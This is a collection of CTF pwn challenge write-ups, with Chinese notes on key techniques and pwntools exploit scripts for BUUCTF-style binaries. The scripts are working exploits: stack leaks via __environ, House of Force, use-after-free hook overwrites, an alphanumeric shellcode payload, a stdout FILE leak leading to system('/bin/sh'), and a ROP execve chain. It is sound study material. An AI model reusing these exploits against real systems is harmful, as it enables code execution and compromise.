wdb2018_guess (较易)考点:
fork子进程
stack smashing
利用environ确定任意栈地址
def exp():
    # wdb2018_guess (stack smashing + __environ stack leak, per the notes above).
    # Helpers ru/sl/sla/uu64 and the elf/libc objects come from the surrounding
    # pwntools template, not this listing. Python 2 script: str is concatenated
    # directly with p64() output.
    ru("Please type your guessing flag")
    # Round 1: 0x128 bytes of filler run up to the pointer the program reads
    # next; it is replaced by puts@GOT so the reply contains a libc address.
    sl('a' * 0x128 + p64(elf.got['puts']))
    # Last 6 bytes up to the 0x7f high byte -> libc address -> libc base.
    libc_base = uu64(ru("\x7f")[-6:]) - libc.sym['puts']
    # Round 2: __environ holds a stack pointer; leaking it anchors stack addresses.
    environ = libc_base + libc.sym["__environ"]
    sla('Please type your guessing flag', 'a' * 0x128 + p64(environ))
    # -0x168 is the distance from the leaked stack pointer to the flag buffer
    # in this particular binary/environment — not portable, confirm in a debugger.
    flag = uu64(ru("\x7f")[-6:]) - 0x168
    # Round 3: read the flag buffer itself.
    sla("Please type your guessing flag", 'a' * 0x128 + p64(flag))
    # Defensive takeaway: the chain needs an unbounded read into a fixed buffer
    # and a program pointer that sits after it; a length-checked read or a
    # stack canary breaks it at round 1.
    pass  # no-op leftover from the template
gyctf_2020_force (较难)考点:
mmap泄露堆地址
House of Force
realloc_hook调整栈帧使og生效
卡在了泄露地址这个点,学到了mmap出来的空间相邻libc的地址
house of force改top chunk的地址为-1(0xfff…)
然后无限申请,算下malloc_hook的偏移到topchunk,然后申请到附近改那两个hook
def exp():
    # gyctf_2020_force (House of Force, per the notes above). add/echo/sla/gdba,
    # `menu` and `_add` are template-defined; add() is assumed to return the
    # address of the new chunk, since the result is used arithmetically below.
    # A 0x200000-byte request is mmap-served; the note records that the mapping
    # sits next to libc, which is where the fixed 0x201000 - 0x10 delta comes from.
    libc_base = add(0x200000, 'mmap') + 0x201000 - 0x10
    echo("base:" + hex(libc_base))
    # Overflow the 0x10 chunk into the top chunk header: size field becomes
    # 0xffffffffffffffff (the "-1" from the notes).
    one_addr = add(0x10, 'a' * 0x10 + p64(0) + p64(0xffffffffffffffff)) - 0x10
    # Request size that moves the top chunk to just below __malloc_hook;
    # the 0x20/0x40 adjustments are header/alignment offsets for this layout.
    size = (libc_base + libc.sym["__malloc_hook"]) - (one_addr + 0x20) - 0x40
    echo(hex(size))
    add(size, 'a')
    # one_gadget offsets — valid only for the libc build shipped with the challenge.
    og = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    # Two adjacent hook writes (the realloc_hook stack-frame trick in the notes);
    # which hook receives which value depends on where this 0x40 chunk lands —
    # the 0x18 padding and the +0x10 into __libc_realloc were tuned in a debugger.
    binsh = add(0x40, '\x00' * 0x18 + p64(libc_base + og[1]) + p64(libc_base + libc.sym["__libc_realloc"] + 0x10))
    gdba()
    # Trigger: the next allocation request goes through the overwritten hooks.
    sla(menu, str(_add))
    sla("size", str(0xdead))
    # Defensive note: this relies on an unchecked heap overflow into the top
    # chunk and on the allocator accepting an absurd top size; newer glibc
    # releases reject a corrupted top size, so the technique is version-bound.
    pass  # no-op leftover from the template
picoctf_2018_buffer overflow 0 (较易)考点:
ssh连接到服务器,运行函数通过命令行传入参数然后泄露出flag
gyctf_2020_some_thing_interesting (中等)考点:
def exp():
    # gyctf_2020_some_thing_interesting. sa/add/free/show/edit/ru/uu64/echo/gdba
    # and the io/libc objects are template-defined; add() here takes two
    # (size, content) pairs per call.
    sa("> Input your code please:", "OreOOrereOOreO")
    add(0x30, p64(0) + p64(0x41), 0x30, p64(0) + p64(0x41))
    add(0x30, 'aaaa', 0x30, 'bbbb')
    # Slot 2 is freed and then still shown: a dangling index (use-after-free).
    # The printed bytes are a heap pointer; -0x80 is a layout-specific offset.
    free(2)
    show(2)
    ru("RE is ")
    heap = uu64(io.recvuntil("\n", drop=True)[-6:]) - 0x80
    echo("heap:" + hex(heap))
    # The freed slot is still editable: its link pointer is redirected to
    # heap + 0x10 so the next same-size allocation is served from there.
    edit(2, '\x00', p64(heap + 0x10))
    # Fake chunk header with size 0x91 — presumably so the following free(1)
    # lands in a bin whose link points into libc (hence the main_arena-style
    # 88 + 0x10 correction below). Verify the exact bin in a debugger.
    payload = p64(0) * 4 + p64(0) + p64(0x91)
    add(0x30, p64(0) + p64(0x31), 0x30, payload)
    free(1)
    show(1)
    libc_base = uu64(ru("\x7f")[-6:]) - 88 - 0x10 - libc.sym["__malloc_hook"]
    echo("libc base:" + hex(libc_base))
    libc.address = libc_base
    add(0x60, 'a', 0x60, 'a')
    add(0x60, 'a', 0x60, 'b')
    # Second dangling-index write: point a freed 0x60 chunk at
    # __malloc_hook - 0x23 (misaligned so the size byte there looks valid),
    # then the allocation that returns it overwrites the hook at offset 0x13.
    free(4)
    edit(4, p64(0), p64(libc.sym["__malloc_hook"] - 0x23))
    # one_gadget offsets — valid only for this libc build.
    og = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    payload = 0x13 * '\x00' + p64(libc.address + og[3])
    add(0x60, 'a', 0x60, payload)
    gdba()
    # Defensive note: every step above depends on show()/edit() still working
    # on a freed index; clearing the slot pointer on free removes the primitive.
    pass  # no-op leftover from the template
mrctf2020_shellcode_revenge (难)考点:
震撼我一整年
def exp():
    # mrctf2020_shellcode_revenge: the service runs whatever printable input it
    # receives; the string below is a pre-encoded alphanumeric payload (see the
    # X86 link after this block). It is reproduced verbatim — it is architecture-
    # and environment-specific and is not meaningful to edit by hand.
    # Defensive note: restricting input to printable characters is not a
    # mitigation on its own; only a non-executable buffer stops this class.
    sa("Show me your magic!", "Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t")
    pass  # no-op leftover from the template
X86:https://introspelliam.github.io/2017/09/30/pwn/%E5%85%A8%E6%98%AF%E5%8F%AF%E8%A7%81%E5%AD%97%E7%AC%A6%E7%9A%84shellcode/
roarctf_2019_realloc_magic (难)考点:
realloc函数的特性
堆布局
2.27下的IO泄露地址
总结:没有edit可以通过连续的free函数做uaf;由于不检查size,在只有heapptr的时候可以realloc(0)后构造overlap,覆盖victim的size,这样的效果可以使得逐个清空某个size大小的tcache bin,最终申请到freehook;泄露io直接申请到stdout的地方改writebase为0x58泄露IO-file-jumps的地址;爆破注意模板
def exp():
    # roarctf_2019_realloc_magic — the summary note above describes the plan:
    # repeated free() as the UAF, realloc(0) overlap to rewrite a victim size,
    # drain one tcache size, then land on __free_hook; the libc leak goes
    # through stdout (write_base low byte -> 0x58). dbg/add/free/backdoor/echo/
    # gdba/ia and the io/libc objects come from the template; free() takes no
    # index because the program only tracks a single pointer.
    dbg()
    add(0x60, 'a')
    add(0, '\x00')
    add(0xa0, 'a')
    add(0, '\x00')
    add(0x10, 'b')
    add(0, '\x00')
    add(0xa0, 'a')
    # Seven frees in a row: the program does not check for double free.
    for i in range(7):
        free()
    add(0, '')
    add(0x60, '\x00')
    # Overlap write: forge a 0x41 size and the low two bytes of a pointer.
    # The 0x97 byte presumably contains ASLR-dependent bits — that is why
    # __main__ below retries until it succeeds ("爆破" in the note).
    payload = 0x60 * 'a' + p64(0) + p64(0x41) + p8(0x60) + p8(0x97)
    add(0x110, payload)
    add(0, '')
    add(0xa0, '\x00')
    add(0, '')
    # stdout FILE overwrite: flags 0xfbad1887, three NULL pointers, then
    # write_base low byte 0x58 so the next output leaks _IO_file_jumps.
    add(0xa0, p64(0xfbad1887) + p64(0) * 3 + p8(0x58))
    # On a wrong guess recvuntil times out and returns '', so u64 yields 0 and
    # leak == -_IO_file_jumps: that is the failure check two lines down.
    leak = u64(io.recvuntil("\x7f", timeout=0.1)[-6:].ljust(8, '\x00')) - libc.sym["_IO_file_jumps"]
    echo("leak:" + hex(leak))
    if leak == -libc.sym["_IO_file_jumps"]:
        exit(-1)  # raises SystemExit; caught by the bare except in __main__
    backdoor()
    __free_hook = leak + libc.sym["__free_hook"]
    add(0x30, 'a')
    free()
    add(0, '')
    # Same overlap trick, now pointing the freed chunk at __free_hook - 8.
    add(0x110, 'a' * 0x68 + p64(0x51) + p64(__free_hook - 8))
    add(0, '')
    add(0x30, p8((__free_hook - 8) & 0xff))
    add(0, '')
    # Chunk at __free_hook - 8: "/bin/sh" then system, so free() on it calls
    # system("/bin/sh").
    add(0x30, '/bin/sh\x00' + p64(leak + libc.sym["system"]))
    gdba()
    ia()


if __name__ == '__main__':
    # Retry loop for the ASLR guess above. NOTE(review): the bare except also
    # swallows KeyboardInterrupt, so Ctrl-C cannot stop this loop; narrow it to
    # `except (Exception, SystemExit):` to keep the intended retry behaviour.
    while True:
        io = remote("node4.buuoj.cn", 29747)
        try:
            exp()
        except:
            io.close()
            continue
强网杯2019 拟态 STKOF (较易)考点:
ROPgadget生成的ropchain长度超了,ropper可以
def exp():
    # 强网杯2019 拟态 STKOF: ROP chain as emitted by ropper (the note above says
    # ROPgadget's chain was too long). Python 2 script — `rop` is a str built
    # from pack() output and `print rop` is the py2 print statement.
    p = lambda x: pack('Q', x)
    # Non-PIE image; every gadget/data address below is an offset from 0x400000.
    IMAGE_BASE_0 = 0x0000000000400000
    rebase_0 = lambda x: p(x + IMAGE_BASE_0)
    rop = ''
    # Gadget semantics are not visible in this listing. From the constants the
    # chain stores '//bin/sh' then a NULL at 0x2a10e0/0x2a10e8 in the image,
    # loads registers from those slots and puts 0x3b (execve) in the syscall
    # register before the final gadget. The 0xdeadbeef words are filler for
    # pops that do not matter. Offsets are specific to this exact binary.
    rop += rebase_0(0x0000000000001d0d)
    rop += '//bin/sh'
    rop += rebase_0(0x00000000000005f6)
    rop += rebase_0(0x00000000002a10e0)
    rop += rebase_0(0x0000000000055ec9)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += rebase_0(0x0000000000001d0d)
    rop += p(0x0000000000000000)
    rop += rebase_0(0x00000000000005f6)
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x0000000000055ec9)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += rebase_0(0x00000000000005f6)
    rop += rebase_0(0x00000000002a10e0)
    rop += rebase_0(0x0000000000005895)
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x000000000003d9d5)
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x000000000003b97c)
    rop += p(0x000000000000003b)
    rop += rebase_0(0x0000000000061645)
    print rop  # dumps the raw chain to stdout (debug aid; noisy on a terminal)
    # 0x118 bytes of filler presumably reach the saved return address; the
    # chain follows. Defensive note: a stack canary or a bounded read would
    # stop this before the first gadget runs.
    payload = 'a' * 0x118
    payload += rop
    echo(hex(len(payload)))
    ru("We give you a little challenge, try to pwn it?")
    sd(payload)
    pass  # no-op leftover from the template
ciscn_2019_final_5